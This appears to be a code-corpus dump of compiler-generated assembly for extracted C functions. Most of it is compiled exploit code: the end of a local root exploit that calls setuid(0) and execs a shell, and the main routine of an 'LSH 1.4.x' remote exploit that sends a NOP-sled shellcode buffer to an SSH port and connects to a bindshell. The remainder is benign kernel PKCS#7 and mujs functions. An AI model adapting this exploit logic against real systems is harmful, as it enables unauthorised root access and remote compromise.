a4,-1 mv a1,s2 mv a0,s4 call mmap@plt ld a5,24(s0) beq a0,a5,.L28 addi s1,s1,8 addi s5,s5,8 beq s1,s7,.L4 ld s2,0(s1) ld s4,0(s5) j .L5 .L4: lw a5,32(s0) lla a2,.LANCHOR0+40 srli a4,a5,32 sw a5,28(zero) sw a4,32(zero) ld a4,64(sp) ld a5,40(sp) srli a4,a4,2 slli a3,a4,3 add a3,a3,a5 beq a4,zero,.L10 .L9: sd a2,0(a5) addi a5,a5,8 bne a3,a5,.L9 .L10: call kqueue@plt sw a0,36(s0) blt a0,zero,.L29 ld a2,48(s0) li a3,0 li a1,0 addi a0,sp,12 call pthread_create@plt ld a2,56(s0) li a3,0 li a1,0 addi a0,sp,16 call pthread_create@plt sd zero,.LANCHOR0+72,a5 li a5,1 lla a0,.LC3 li s2,8192 sw a5,64(s0) li s1,0 call puts@plt addi s2,s2,1807 j .L11 .L30: addiw s1,s1,1 .L12: li a0,100 call usleep@plt .L11: lw a5,80(s0) beq a5,zero,.L12 ble s1,s2,.L30 li a0,0 call setuid@plt call getuid@plt bne a0,zero,.L31 li a2,0 lla a1,.LC5 lla a0,.LC6 call execl@plt sw zero,20(sp) lw a3,20(sp) li a5,4 li a4,4 bgt a3,a5,.L16 .L15: lw a5,20(sp) addiw a5,a5,1 sw a5,20(sp) lw a5,20(sp) ble a5,a4,.L15 .L16: li a0,0 .L3: ld a4, 72(sp) ld a5, 0(s3) xor a5, a4, a5 li a4, 0 bne a5,zero,.L32 ld ra,152(sp) ld s0,144(sp) ld s1,136(sp) ld s2,128(sp) ld s3,120(sp) ld s4,112(sp) ld s5,104(sp) ld s6,96(sp) ld s7,88(sp) addi sp,sp,160 jr ra .L28: lla a0,.LC1 call perror@plt li a0,-1 j .L3 .L31: lla a0,.LC4 call puts@plt li a0,-1 j .L3 .L29: lla a0,.LC2 call perror@plt li a0,-1 j .L3 .L32: call __stack_chk_fail@plt .size main, .-main .globl timeout .globl kq .globl kernel_code .globl gotroot .globl do_thread2 .globl do_thread .globl PROT_WRITE .globl PROT_READ .globl PROT_EXEC .globl MAP_FIXED .globl MAP_FAILED .globl MAP_ANON .globl JE_ADDRESS .bss .align 3 .set .LANCHOR0,. + 0 .type MAP_ANON, @object .size MAP_ANON, 4 MAP_ANON: .zero 4 .type MAP_FIXED, @object .size MAP_FIXED, 4 MAP_FIXED: .zero 4 .type PROT_READ, @object .size PROT_READ, 4 PROT_READ: .zero 4 .type PROT_WRITE, @object .size PROT_WRITE, 4 PROT_WRITE: .zero 4 .type PROT_EXEC, @object .size PROT_EXEC, 4 PROT_EXEC: .zero 4 .zero 4 .type MAP_FAILED, @object .size MAP_FAILED, 8 MAP_FAILED: .zero 8 .type JE_ADDRESS, @object .size JE_ADDRESS, 4 JE_ADDRESS: .zero 4 .type kq, @object .size kq, 4 kq: .zero 4 .type kernel_code, @object .size kernel_code, 4 kernel_code: .zero 4 .zero 4 .type do_thread, @object .size do_thread, 8 do_thread: .zero 8 .type do_thread2, @object .size do_thread2, 8 do_thread2: .zero 8 .type timeout, @object .size timeout, 16 timeout: .zero 16 .type gotroot, @object .size gotroot, 4 gotroot: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_23161.c_main_aug_v3_7
.file "extr_23161.c_main_aug_v3_7.c" .text .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC0: .string "LSH 1.4.x (others?) exploit by Haggis ([email protected])\n" .section .rodata.str1.1,"aMS",@progbits,1 .LC1: .string "Available platforms:" .LC2: .string " %2d. %s\n" .LC3: .string "t:T:h" .section .rodata.str1.8 .align 8 .LC4: .string "[*] You must specify a host! Use -h for help" .align 8 .LC5: .string "[*] Couldn't resolve host %s\nUse '%s -h' for help\n" .align 8 .LC6: .string "[*] Coulnd't connect to host %s\n" .align 8 .LC7: .string "[-] Building exploit buffer..." .section .rodata.str1.1 .LC8: .string "[-] Sending exploit string..." .LC9: .string "[-] Sleeping..." .section .rodata.str1.8 .align 8 .LC10: .string "[-] Connecting to bindshell..." .align 8 .LC11: .string "[*] Could not connect to %s - the exploit failed\n" .section .text.startup,"ax",@progbits .p2align 4 .globl main .type main, @function main: .LFB0: .cfi_startproc endbr64 pushq %r15 .cfi_def_cfa_offset 16 .cfi_offset 15, -16 pushq %r14 .cfi_def_cfa_offset 24 .cfi_offset 14, -24 pushq %r13 .cfi_def_cfa_offset 32 .cfi_offset 13, -32 leaq .LC3(%rip), %r13 pushq %r12 .cfi_def_cfa_offset 40 .cfi_offset 12, -40 movl %edi, %r12d leaq .LC0(%rip), %rdi pushq %rbp .cfi_def_cfa_offset 48 .cfi_offset 6, -48 movq %rsi, %rbp pushq %rbx .cfi_def_cfa_offset 56 .cfi_offset 3, -56 leaq .LC2(%rip), %rbx subq $8, %rsp .cfi_def_cfa_offset 64 call puts@PLT .p2align 4,,10 .p2align 3 .L2: movq %r13, %rdx movq %rbp, %rsi movl %r12d, %edi call getopt@PLT cmpl $-1, %eax je .L23 cmpl $84, %eax je .L3 cmpl $116, %eax jne .L4 movl SIZ(%rip), %eax movl optarg(%rip), %esi movq host(%rip), %rdi leal -1(%rax), %edx call strncpy@PLT jmp .L2 .p2align 4,,10 .p2align 3 .L3: movl optarg(%rip), %edi call atoi@PLT movq %rax, useTarget(%rip) jmp .L2 .p2align 4,,10 .p2align 3 .L4: movq usage(%rip), %rdi movq $-16, %r14 xorl %r15d, %r15d call puts@PLT leaq .LC1(%rip), %rdi call puts@PLT movq targets(%rip), %rax movq (%rax), %rdx testq %rdx, %rdx je .L7 .p2align 4,,10 .p2align 3 .L6: movl %r15d, %esi movq %rbx, %rdi xorl %eax, %eax subl $1, %r15d call printf@PLT movq targets(%rip), %rax movq (%rax,%r14), %rdx subq $16, %r14 testq %rdx, %rdx jne .L6 .L7: movl $10, %edi call putchar@PLT xorl %edi, %edi call exit@PLT jmp .L2 .p2align 4,,10 .p2align 3 .L23: movq host(%rip), %rdi cmpb $0, (%rdi) je .L24 .L9: call gethostbyname@PLT movq %rax, hostStruct(%rip) testq %rax, %rax je .L25 .L10: movl SSH_PORT(%rip), %edi call connect_to_host@PLT movl %eax, %r13d cmpl $-1, %eax je .L26 .L11: movl %r13d, %edi call my_recv@PLT leaq .LC7(%rip), %rdi call puts@PLT movl EXPLOIT_BUF_SIZE(%rip), %r9d movq buf(%rip), %rbp testl %r9d, %r9d leal 3(%r9), %edi cmovns %r9d, %edi sarl $2, %edi cmpl $3, %r9d jle .L12 movq targets(%rip), %r8 movq %rbp, %rcx xorl %edx, %edx .p2align 4,,10 .p2align 3 .L13: movq useTarget(%rip), %rax movq %rcx, %rsi addl $1, %edx addq $8, %rcx salq $4, %rax movslq 8(%r8,%rax), %rax movq %rax, (%rsi) cmpl %edi, %edx jl .L13 leal -1(%rdi), %eax cmpl $3, %r9d movl $8, %edx leaq 8(,%rax,8), %rax cmovle %rdx, %rax addq %rax, %rbp .L12: xorl %r12d, %r12d jmp .L14 .p2align 4,,10 .p2align 3 .L15: movb $-112, 0(%rbp) addq $1, %rbp addl $1, %r12d .L14: movl shellcode(%rip), %edi movl NOPS_LEN(%rip), %ebx call strlen@PLT subl %eax, %ebx cmpl %r12d, %ebx jg .L15 movl shellcode(%rip), %edi call strlen@PLT movl shellcode(%rip), %esi movq %rbp, %rdi movl %eax, %edx call memcpy@PLT movl shellcode(%rip), %edi call strlen@PLT cltq movb $10, 0(%rbp,%rax) movl shellcode(%rip), %edi call strlen@PLT leaq .LC8(%rip), %rdi cltq movb $0, 1(%rbp,%rax) call puts@PLT movq buf(%rip), %rsi movl %r13d, %edi call my_send@PLT movl %r13d, %edi call close@PLT leaq .LC9(%rip), %rdi call puts@PLT movl $100000, %edi call my_sleep@PLT leaq .LC10(%rip), %rdi call puts@PLT xorl %eax, %eax call do_bind_shell@PLT cmpl $-1, %eax je .L27 .L16: xorl %edi, %edi call exit@PLT addq $8, %rsp .cfi_remember_state .cfi_def_cfa_offset 56 xorl %eax, %eax popq %rbx .cfi_def_cfa_offset 48 popq %rbp .cfi_def_cfa_offset 40 popq %r12 .cfi_def_cfa_offset 32 popq %r13 .cfi_def_cfa_offset 24 popq %r14 .cfi_def_cfa_offset 16 popq %r15 .cfi_def_cfa_offset 8 ret .L24: .cfi_restore_state leaq .LC4(%rip), %rdi call puts@PLT movl $1, %edi call exit@PLT movq host(%rip), %rdi jmp .L9 .L27: movq host(%rip), %rsi leaq .LC11(%rip), %rdi xorl %eax, %eax call printf@PLT jmp .L16 .L26: movq host(%rip), %rsi leaq .LC6(%rip), %rdi xorl %eax, %eax call printf@PLT movl $1, %edi call exit@PLT jmp .L11 .L25: movq 0(%rbp), %rdx movq host(%rip), %rsi leaq .LC5(%rip), %rdi call printf@PLT movl $1, %edi call exit@PLT jmp .L10 .cfi_endproc .LFE0: .size main, .-main .globl useTarget .bss .align 8 .type useTarget, @object .size useTarget, 8 useTarget: .zero 8 .globl usage .align 8 .type usage, @object .size usage, 8 usage: .zero 8 .globl targets .align 8 .type targets, @object .size targets, 8 targets: .zero 8 .globl shellcode .align 4 .type shellcode, @object .size shellcode, 4 shellcode: .zero 4 .globl optarg .align 4 .type optarg, @object .size optarg, 4 optarg: .zero 4 .globl hostStruct .align 8 .type hostStruct, @object .size hostStruct, 8 hostStruct: .zero 8 .globl host .align 8 .type host, @object .size host, 8 host: .zero 8 .globl buf .align 8 .type buf, @object .size buf, 8 buf: .zero 8 .globl SSH_PORT .align 4 .type SSH_PORT, @object .size SSH_PORT, 4 SSH_PORT: .zero 4 .globl SIZ .align 4 .type SIZ, @object .size SIZ, 4 SIZ: .zero 4 .globl NOPS_LEN .align 4 .type NOPS_LEN, @object .size NOPS_LEN, 4 NOPS_LEN: .zero 4 .globl EXPLOIT_BUF_SIZE .align 4 .type EXPLOIT_BUF_SIZE, @object .size EXPLOIT_BUF_SIZE, 4 EXPLOIT_BUF_SIZE: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_23161.c_main_aug_v3_7.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "LSH 1.4.x (others?) exploit by Haggis ([email protected])\n" .align 3 .LC1: .string "Available platforms:" .align 3 .LC2: .string " %2d. %s\n" .align 3 .LC3: .string "t:T:h" .align 3 .LC4: .string "[*] You must specify a host! Use -h for help" .align 3 .LC5: .string "[*] Couldn't resolve host %s\nUse '%s -h' for help\n" .align 3 .LC6: .string "[*] Coulnd't connect to host %s\n" .align 3 .LC7: .string "[-] Building exploit buffer..." .align 3 .LC8: .string "[-] Sending exploit string..." .align 3 .LC9: .string "[-] Sleeping..." .align 3 .LC10: .string "[-] Connecting to bindshell..." .align 3 .LC11: .string "[*] Could not connect to %s - the exploit failed\n" .section .text.startup,"ax",@progbits .align 1 .globl main .type main, @function main: addi sp,sp,-96 sd s3,56(sp) mv s3,a0 lla a0,.LC0 sd s0,80(sp) sd s1,72(sp) sd s2,64(sp) sd s4,48(sp) sd s5,40(sp) sd s6,32(sp) sd s7,24(sp) sd s8,16(sp) sd ra,88(sp) sd s9,8(sp) sd s10,0(sp) mv s2,a1 lla s0,.LANCHOR0 call puts@plt lla s5,.LC3 li s4,-1 li s7,84 li s6,116 lla s8,.LC1 lla s1,.LC2 .L2: mv a2,s5 mv a1,s2 mv a0,s3 call getopt@plt beq a0,s4,.L25 .L8: beq a0,s7,.L3 bne a0,s6,.L4 lw a2,0(s0) lw a1,4(s0) ld a0,8(s0) addiw a2,a2,-1 call strncpy@plt mv a2,s5 mv a1,s2 mv a0,s3 call getopt@plt bne a0,s4,.L8 .L25: ld a0,8(s0) lbu a5,0(a0) beq a5,zero,.L26 .L9: call gethostbyname@plt sd a0,40(s0) beq a0,zero,.L27 .L10: lw a0,48(s0) call connect_to_host@plt li a5,-1 mv s4,a0 beq a0,a5,.L28 .L11: mv a0,s4 call my_recv@plt lla a0,.LC7 call puts@plt lw a7,64(s0) li a5,3 ld s2,56(s0) sraiw a1,a7,31 srliw a1,a1,30 addw a1,a1,a7 sraiw a0,a1,2 mv a1,a0 ble a7,a5,.L12 ld a6,32(s0) mv a3,s2 li a4,0 .L13: ld a5,16(s0) mv a2,a3 addiw a4,a4,1 slli a5,a5,4 add a5,a6,a5 lw a5,8(a5) addi a3,a3,8 sd a5,0(a2) blt a4,a0,.L13 li a4,3 li a5,8 bgt a7,a4,.L29 .L15: add s2,s2,a5 .L12: li s3,0 li s5,-112 j .L16 .L17: addi s2,s2,1 addiw s3,s3,1 sb s5,-1(s2) .L16: lw a0,72(s0) lw s1,68(s0) call strlen@plt subw s1,s1,a0 bgt s1,s3,.L17 lw s1,72(s0) mv a0,s1 call strlen@plt mv a2,a0 mv a1,s1 mv a0,s2 call memcpy@plt lw a0,72(s0) call strlen@plt li a5,10 add a0,s2,a0 sb a5,0(a0) lw a0,72(s0) call strlen@plt add s2,s2,a0 sb zero,1(s2) lla a0,.LC8 call puts@plt ld a1,56(s0) mv a0,s4 call my_send@plt mv a0,s4 call close@plt lla a0,.LC9 call puts@plt li a0,98304 addi a0,a0,1696 call my_sleep@plt lla a0,.LC10 call puts@plt call do_bind_shell@plt li a5,-1 beq a0,a5,.L30 .L18: li a0,0 call exit@plt ld ra,88(sp) ld s0,80(sp) ld s1,72(sp) ld s2,64(sp) ld s3,56(sp) ld s4,48(sp) ld s5,40(sp) ld s6,32(sp) ld s7,24(sp) ld s8,16(sp) ld s9,8(sp) ld s10,0(sp) li a0,0 addi sp,sp,96 jr ra .L4: ld a0,24(s0) li s10,-16 li s9,0 call puts@plt mv a0,s8 call puts@plt ld a5,32(s0) ld a2,0(a5) beq a2,zero,.L7 .L6: mv a1,s9 mv a0,s1 call printf@plt ld a5,32(s0) addiw s9,s9,-1 add a5,a5,s10 ld a2,0(a5) addi s10,s10,-16 bne a2,zero,.L6 .L7: li a0,10 call putchar@plt li a0,0 call exit@plt j .L2 .L3: lw a0,4(s0) call atoi@plt sd a0,16(s0) j .L2 .L29: addiw a1,a1,-1 slli a5,a1,32 srli a1,a5,29 addi a5,a1,8 j .L15 .L26: lla a0,.LC4 call puts@plt li a0,1 call exit@plt ld a0,8(s0) j .L9 .L30: ld a1,8(s0) lla a0,.LC11 call printf@plt j .L18 .L28: ld a1,8(s0) lla a0,.LC6 call printf@plt li a0,1 call exit@plt j .L11 .L27: ld a2,0(s2) ld a1,8(s0) lla a0,.LC5 call printf@plt li a0,1 call exit@plt j .L10 .size main, .-main .globl useTarget .globl usage .globl targets .globl shellcode .globl optarg .globl hostStruct .globl host .globl buf .globl SSH_PORT .globl SIZ .globl NOPS_LEN .globl EXPLOIT_BUF_SIZE .bss .align 3 .set .LANCHOR0,. + 0 .type SIZ, @object .size SIZ, 4 SIZ: .zero 4 .type optarg, @object .size optarg, 4 optarg: .zero 4 .type host, @object .size host, 8 host: .zero 8 .type useTarget, @object .size useTarget, 8 useTarget: .zero 8 .type usage, @object .size usage, 8 usage: .zero 8 .type targets, @object .size targets, 8 targets: .zero 8 .type hostStruct, @object .size hostStruct, 8 hostStruct: .zero 8 .type SSH_PORT, @object .size SSH_PORT, 4 SSH_PORT: .zero 4 .zero 4 .type buf, @object .size buf, 8 buf: .zero 8 .type EXPLOIT_BUF_SIZE, @object .size EXPLOIT_BUF_SIZE, 4 EXPLOIT_BUF_SIZE: .zero 4 .type NOPS_LEN, @object .size NOPS_LEN, 4 NOPS_LEN: .zero 4 .type shellcode, @object .size shellcode, 4 shellcode: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_pkcs7_verify.c_pkcs7_digest_aug_v3_4
.file "extr_pkcs7_verify.c_pkcs7_digest_aug_v3_4.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string ",%u,%s" .LC1: .string "MsgDigest = [%*ph]\n" .LC2: .string "Sig %u: No messageDigest\n" .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC3: .string "Sig %u: Invalid digest size (%u)\n" .align 8 .LC4: .string "Sig %u: Message digest doesn't match\n" .section .rodata.str1.1 .LC5: .string "AADigest = [%*ph]\n" .LC6: .string " = %d" .text .p2align 4 .type pkcs7_digest, @function pkcs7_digest: .LFB25: .cfi_startproc endbr64 pushq %r15 .cfi_def_cfa_offset 16 .cfi_offset 15, -16 pushq %r14 .cfi_def_cfa_offset 24 .cfi_offset 14, -24 pushq %r13 .cfi_def_cfa_offset 32 .cfi_offset 13, -32 movq %rdi, %r13 leaq .LC0(%rip), %rdi pushq %r12 .cfi_def_cfa_offset 40 .cfi_offset 12, -40 pushq %rbp .cfi_def_cfa_offset 48 .cfi_offset 6, -48 pushq %rbx .cfi_def_cfa_offset 56 .cfi_offset 3, -56 movq %rsi, %rbx subq $24, %rsp .cfi_def_cfa_offset 80 movq 24(%rsi), %rbp movl 16(%rsi), %esi movq %fs:40, %rax movq %rax, 8(%rsp) xorl %eax, %eax movl 16(%rbp), %edx call kenter@PLT cmpq $0, 8(%rbp) jne .L14 movq 24(%rbx), %rax movl 16(%rax), %edi testl %edi, %edi jne .L3 .L22: movl ENOPKG(%rip), %r12d negl %r12d .L1: movq 8(%rsp), %rax subq %fs:40, %rax jne .L23 addq $24, %rsp .cfi_remember_state .cfi_def_cfa_offset 56 movl %r12d, %eax popq %rbx .cfi_def_cfa_offset 48 popq %rbp .cfi_def_cfa_offset 40 popq %r12 .cfi_def_cfa_offset 32 popq %r13 .cfi_def_cfa_offset 24 popq %r14 .cfi_def_cfa_offset 16 popq %r15 .cfi_def_cfa_offset 8 ret .p2align 4,,10 .p2align 3 .L3: .cfi_restore_state xorl %edx, %edx xorl %esi, %esi call crypto_alloc_shash@PLT movq %rax, %rdi movq %rax, %r14 call IS_ERR@PLT movq %r14, %rdi testq %rax, %rax jne .L25 call crypto_shash_descsize@PLT movq %r14, %rdi movl %eax, %r15d call crypto_shash_digestsize@PLT movl GFP_KERNEL(%rip), %esi movl ENOMEM(%rip), %r12d movq %rax, 0(%rbp) movq %rax, %rdi negl %r12d call kmalloc@PLT movq %rax, 8(%rbp) testq %rax, %rax jne .L26 .L7: movq %r14, %rdi call crypto_free_shash@PLT movl %r12d, %esi leaq .LC6(%rip), %rdi call kleave@PLT jmp .L1 .p2align 4,,10 .p2align 3 .L14: xorl %r12d, %r12d jmp .L1 .p2align 4,,10 .p2align 3 .L26: movslq %r15d, %rdi movl GFP_KERNEL(%rip), %esi addq $8, %rdi call kzalloc@PLT movq %rax, %r15 testq %rax, %rax je .L7 movq 8(%rbp), %rcx movl 4(%r13), %esi movq %r14, (%rax) movq %rax, %rdi movl 0(%r13), %edx call crypto_shash_digest@PLT movl %eax, %r12d testl %eax, %eax js .L8 movq 8(%rbp), %rdx movl $8, %esi leaq .LC1(%rip), %rdi call pr_devel@PLT movl 12(%rbx), %eax testl %eax, %eax je .L8 movl 20(%rbx), %esi testl %esi, %esi je .L27 movq (%rbx), %rdx cmpq 0(%rbp), %rdx je .L11 movl 16(%rbx), %esi leaq .LC3(%rip), %rdi xorl %eax, %eax call pr_debug@PLT movl EBADMSG(%rip), %r12d negl %r12d .p2align 4,,10 .p2align 3 .L8: movq %r15, %rdi call kfree@PLT jmp .L7 .p2align 4,,10 .p2align 3 .L25: call PTR_ERR@PLT addl ENOENT(%rip), %eax je .L22 movq 8(%rsp), %rax subq %fs:40, %rax jne .L23 addq $24, %rsp .cfi_remember_state .cfi_def_cfa_offset 56 movq %r14, %rdi popq %rbx .cfi_def_cfa_offset 48 popq %rbp .cfi_def_cfa_offset 40 popq %r12 .cfi_def_cfa_offset 32 popq %r13 .cfi_def_cfa_offset 24 popq %r14 .cfi_def_cfa_offset 16 popq %r15 .cfi_def_cfa_offset 8 jmp PTR_ERR@PLT .L11: .cfi_restore_state movq 8(%rbp), %rdi call memcmp@PLT testq %rax, %rax jne .L28 movq 8(%rbp), %rdi movq 0(%rbp), %rdx xorl %esi, %esi call memset@PLT movq %r15, %rdi call crypto_shash_init@PLT movl %eax, %r12d testl %eax, %eax js .L8 movl ASN1_CONS_BIT(%rip), %eax leaq 4(%rsp), %rsi movl $1, %edx movq %r15, %rdi orl ASN1_SET(%rip), %eax movl %eax, 4(%rsp) call crypto_shash_update@PLT movl %eax, %r12d testl %eax, %eax js .L8 movq 8(%rbp), %rcx movl 8(%rbx), %edx movq %r15, %rdi movl 12(%rbx), %esi call crypto_shash_finup@PLT movl %eax, %r12d testl %eax, %eax js .L8 movq 8(%rbp), %rdx movl $8, %esi leaq .LC5(%rip), %rdi call pr_devel@PLT jmp .L8 .L27: movl 16(%rbx), %esi leaq .LC2(%rip), %rdi call pr_warn@PLT movl EKEYREJECTED(%rip), %r12d negl %r12d jmp .L8 .L28: movl 16(%rbx), %esi leaq .LC4(%rip), %rdi xorl %eax, %eax call pr_debug@PLT movl EKEYREJECTED(%rip), %r12d negl %r12d jmp .L8 .L23: call __stack_chk_fail@PLT .cfi_endproc .LFE25: .size pkcs7_digest, .-pkcs7_digest .globl GFP_KERNEL .bss .align 4 .type GFP_KERNEL, @object .size GFP_KERNEL, 4 GFP_KERNEL: .zero 4 .globl ENOPKG .align 4 .type ENOPKG, @object .size ENOPKG, 4 ENOPKG: .zero 4 .globl ENOMEM .align 4 .type ENOMEM, @object .size ENOMEM, 4 ENOMEM: .zero 4 .globl ENOENT .align 4 .type ENOENT, @object .size ENOENT, 4 ENOENT: .zero 4 .globl EKEYREJECTED .align 4 .type EKEYREJECTED, @object .size EKEYREJECTED, 4 EKEYREJECTED: .zero 4 .globl EBADMSG .align 4 .type EBADMSG, @object .size EBADMSG, 4 EBADMSG: .zero 4 .globl ASN1_SET .align 4 .type ASN1_SET, @object .size ASN1_SET, 4 ASN1_SET: .zero 4 .globl ASN1_CONS_BIT .align 4 .type ASN1_CONS_BIT, @object .size ASN1_CONS_BIT, 4 ASN1_CONS_BIT: .zero 4 .globl g_aug_volatile_8565 .data .align 4 .type g_aug_volatile_8565, @object .size g_aug_volatile_8565, 4 g_aug_volatile_8565: .long 6 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_pkcs7_verify.c_pkcs7_digest_aug_v3_4.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string ",%u,%s" .align 3 .LC1: .string "MsgDigest = [%*ph]\n" .align 3 .LC2: .string "Sig %u: No messageDigest\n" .align 3 .LC3: .string "Sig %u: Invalid digest size (%u)\n" .align 3 .LC4: .string "Sig %u: Message digest doesn't match\n" .align 3 .LC5: .string "AADigest = [%*ph]\n" .align 3 .LC6: .string " = %d" .text .align 1 .type pkcs7_digest, @function pkcs7_digest: addi sp,sp,-96 sd s4,48(sp) ld s4,24(a1) sd s0,80(sp) mv s0,a1 lw a2,16(s4) lw a1,16(a1) sd s2,64(sp) la s2,__stack_chk_guard sd s5,40(sp) ld a5, 0(s2) sd a5, 8(sp) li a5, 0 mv s5,a0 lla a0,.LC0 sd ra,88(sp) sd s1,72(sp) sd s3,56(sp) sd s6,32(sp) sd s7,24(sp) call kenter@plt ld a5,8(s4) bne a5,zero,.L14 ld a5,24(s0) lw a0,16(a5) bne a0,zero,.L3 lw s1,.LANCHOR0 negw s1,s1 .L2: ld a4, 8(sp) ld a5, 0(s2) xor a5, a4, a5 li a4, 0 bne a5,zero,.L25 ld ra,88(sp) ld s0,80(sp) ld s2,64(sp) ld s3,56(sp) ld s4,48(sp) ld s5,40(sp) ld s6,32(sp) ld s7,24(sp) mv a0,s1 ld s1,72(sp) addi sp,sp,96 jr ra .L3: li a2,0 li a1,0 call crypto_alloc_shash@plt mv s3,a0 call IS_ERR@plt bne a0,zero,.L27 mv a0,s3 call crypto_shash_descsize@plt mv s7,a0 mv a0,s3 call crypto_shash_digestsize@plt lla s6,.LANCHOR0 lw a1,12(s6) lw s1,8(s6) sd a0,0(s4) call kmalloc@plt sd a0,8(s4) negw s1,s1 bne a0,zero,.L28 .L7: mv a0,s3 call crypto_free_shash@plt mv a1,s1 lla a0,.LC6 call kleave@plt j .L2 .L14: li s1,0 j .L2 .L28: lw a1,12(s6) addi a0,s7,8 call kzalloc@plt mv s7,a0 beq a0,zero,.L7 ld a3,8(s4) lw a2,0(s5) lw a1,4(s5) sd s3,0(a0) call crypto_shash_digest@plt mv s1,a0 blt a0,zero,.L8 ld a2,8(s4) li a1,8 lla a0,.LC1 call pr_devel@plt lw a5,12(s0) beq a5,zero,.L8 lw a1,20(s0) beq a1,zero,.L29 ld a2,0(s0) ld a5,0(s4) beq a2,a5,.L11 lw a1,16(s0) lla a0,.LC3 call pr_debug@plt lw s1,20(s6) negw s1,s1 .L8: mv a0,s7 call kfree@plt j .L7 .L27: mv a0,s3 call PTR_ERR@plt lla a4,.LANCHOR0 lw a5,4(a4) negw a5,a5 bne a5,a0,.L5 lw s1,0(a4) negw s1,s1 j .L2 .L5: ld a4, 8(sp) ld a5, 0(s2) xor a5, a4, a5 li a4, 0 bne a5,zero,.L25 ld s0,80(sp) ld ra,88(sp) ld s1,72(sp) ld s2,64(sp) ld s4,48(sp) ld s5,40(sp) ld s6,32(sp) ld s7,24(sp) mv a0,s3 ld s3,56(sp) addi sp,sp,96 tail PTR_ERR@plt .L11: ld a0,8(s4) call memcmp@plt bne a0,zero,.L30 ld a2,0(s4) ld a0,8(s4) li a1,0 call memset@plt mv a0,s7 call crypto_shash_init@plt mv s1,a0 blt a0,zero,.L8 lw a5,24(s6) lw a4,28(s6) li a2,1 addi a1,sp,4 or a5,a5,a4 mv a0,s7 sw a5,4(sp) call crypto_shash_update@plt mv s1,a0 blt a0,zero,.L8 ld a3,8(s4) lw a2,8(s0) lw a1,12(s0) mv a0,s7 call crypto_shash_finup@plt mv s1,a0 blt a0,zero,.L8 ld a2,8(s4) li a1,8 lla a0,.LC5 call pr_devel@plt j .L8 .L29: lw a1,16(s0) lla a0,.LC2 call pr_warn@plt lw s1,16(s6) negw s1,s1 j .L8 .L30: lw a1,16(s0) lla a0,.LC4 call pr_debug@plt lw s1,16(s6) negw s1,s1 j .L8 .L25: call __stack_chk_fail@plt .size pkcs7_digest, .-pkcs7_digest .globl GFP_KERNEL .globl ENOPKG .globl ENOMEM .globl ENOENT .globl EKEYREJECTED .globl EBADMSG .globl ASN1_SET .globl ASN1_CONS_BIT .globl g_aug_volatile_8565 .data .align 2 .type g_aug_volatile_8565, @object .size g_aug_volatile_8565, 4 g_aug_volatile_8565: .word 6 .bss .align 2 .set .LANCHOR0,. + 0 .type ENOPKG, @object .size ENOPKG, 4 ENOPKG: .zero 4 .type ENOENT, @object .size ENOENT, 4 ENOENT: .zero 4 .type ENOMEM, @object .size ENOMEM, 4 ENOMEM: .zero 4 .type GFP_KERNEL, @object .size GFP_KERNEL, 4 GFP_KERNEL: .zero 4 .type EKEYREJECTED, @object .size EKEYREJECTED, 4 EKEYREJECTED: .zero 4 .type EBADMSG, @object .size EBADMSG, 4 EBADMSG: .zero 4 .type ASN1_CONS_BIT, @object .size ASN1_CONS_BIT, 4 ASN1_CONS_BIT: .zero 4 .type ASN1_SET, @object .size ASN1_SET, 4 ASN1_SET: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_main.c_usage_aug_v3_3
.file "extr_main.c_usage_aug_v3_3.c" .text .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC0: .string "Usage: mujs [options] [script [scriptArgs*]]\n" .align 8 .LC1: .string "\t-i: Enter interactive prompt after running code.\n" .section .rodata.str1.1,"aMS",@progbits,1 .LC2: .string "\t-s: Check strictness.\n" .text .p2align 4 .type usage, @function usage: .LFB0: .cfi_startproc endbr64 subq $8, %rsp .cfi_def_cfa_offset 16 movl stderr(%rip), %edi leaq .LC0(%rip), %rsi call fprintf@PLT movl stderr(%rip), %edi leaq .LC1(%rip), %rsi call fprintf@PLT movl stderr(%rip), %edi leaq .LC2(%rip), %rsi call fprintf@PLT movl $1, %edi addq $8, %rsp .cfi_def_cfa_offset 8 jmp exit@PLT .cfi_endproc .LFE0: .size usage, .-usage .globl stderr .bss .align 4 .type stderr, @object .size stderr, 4 stderr: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
